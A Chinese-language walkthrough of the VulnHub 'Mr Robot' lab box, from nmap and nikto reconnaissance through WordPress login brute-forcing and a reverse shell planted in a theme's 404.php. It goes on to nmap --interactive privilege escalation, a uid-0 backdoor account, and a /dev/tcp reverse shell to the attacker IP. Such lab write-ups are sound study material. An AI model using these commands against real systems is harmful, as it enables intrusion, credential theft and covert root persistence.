Vulnhub-23mrRobot-1

信息收集

1
2
3
arp-scan -l          nmap --min-rate 100000 -p- 192.168.240.132     nmap --min-rate 100000 -p22,80,443 -A 192.168.240.132

dirsearch -u 192.168.240.132   dirb  http://192.168.240.132/      nikto -host 192.168.240.132 -p 80

22端口

1
22/tcp  closed ssh

80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

└─# nikto -host 192.168.240.132 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.132
+ Target Hostname:    192.168.240.132
+ Target Port:        80
+ Start Time:         2024-12-01 09:14:42 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /3TVZlj5i.asmx: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <http://192.168.240.132/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2024-12-01 09:16:26 (GMT8) (104 seconds)
存在robots.txt,找到一个字典还有一个密钥

443端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

└─# nikto -host 192.168.240.132 -p 443
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.132
+ Target Hostname:    192.168.240.132
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /CN=www.example.com
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /CN=www.example.com
+ Start Time:         2024-12-01 09:15:21 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /uN3ftIqo.sys: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: The Content-Encoding header is set to "deflate" which may mean that the server is vulnerable to the BREACH attack. See: http://breachattack.com/
+ Hostname '192.168.240.132' does not match certificate's names: www.example.com. See: https://cwe.mitre.org/data/definitions/297.html
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <https://192.168.240.132/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the secure flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8103 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2024-12-01 09:18:55 (GMT8) (214 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
也有robots.txt以及字典文件

渗透测试

80端口

1
1.用字典文件对登陆页面进行爆破(集束炸弹模式(Cluster bomb)) 得到账号密码elliot // ER28-0652

image-20241201101427710

1
2
3
找到404.php,在里面写反弹shell,访问http://192.168.240.132/wp-content/themes/twentyfifteen/404.php或者直接http://192.168.240.132/404.php
连接上shell,获得交互式shell python -c 'import pty;pty.spawn("/bin/bash")'
交互式shell:bash -i

image-20241201140350016

443端口

1
同样的操作,就不做渗透测试了

提权

信息收集

1
2
daemon@linux:/$ ls /home/robot
key-2-of-3.txt:有robot权限才能看(822c73956184f694993bede3eb39f959)  password.raw-md5:c3fcd3d76192e4007dfb496cca67e13b--用md5解密   abcdefghijklmnopqrstuvwxyz

image-20241201142217858

提权

1
2
SUID提权
使用find命令发现系统上运行的所有SUID可执行文件:命令:find / -perm -u=s -type f 2>/dev/null

image-20241201142908708

1
2
3
4
5
6
7
8
9
可以用sudo也可以用nmap
尝试sudo之后说不让用,现在尝试nmap
nmap --interactive 进入交互界面
输入!sh
创建root账号 useradd -u 0 -o -g 0 -G root -s /bin/bash -d /home/root2 -m root2   设置root1密码  sudo passwd root1
/bin/bash -i \>& /dev/tcp/192.168.240.130/1112 0\>&1  反弹shell,但是会遇到终端无法正确解释上下左右的转义序列
这时候就不能通过修改uid来维权,建议开启22号端口进行ssh登录robot账号(service ssh start),再通过nmap提权
或者直接用nano修改/etc/passwd,这里有点小插曲。我修改了robot的uid和gid之后发现用户id没有变,我把ssh登录的账号退出了之后重新反弹shell,接着重新su robot
这时候发现输入密码之后我变成了root账号

image-20241201143052579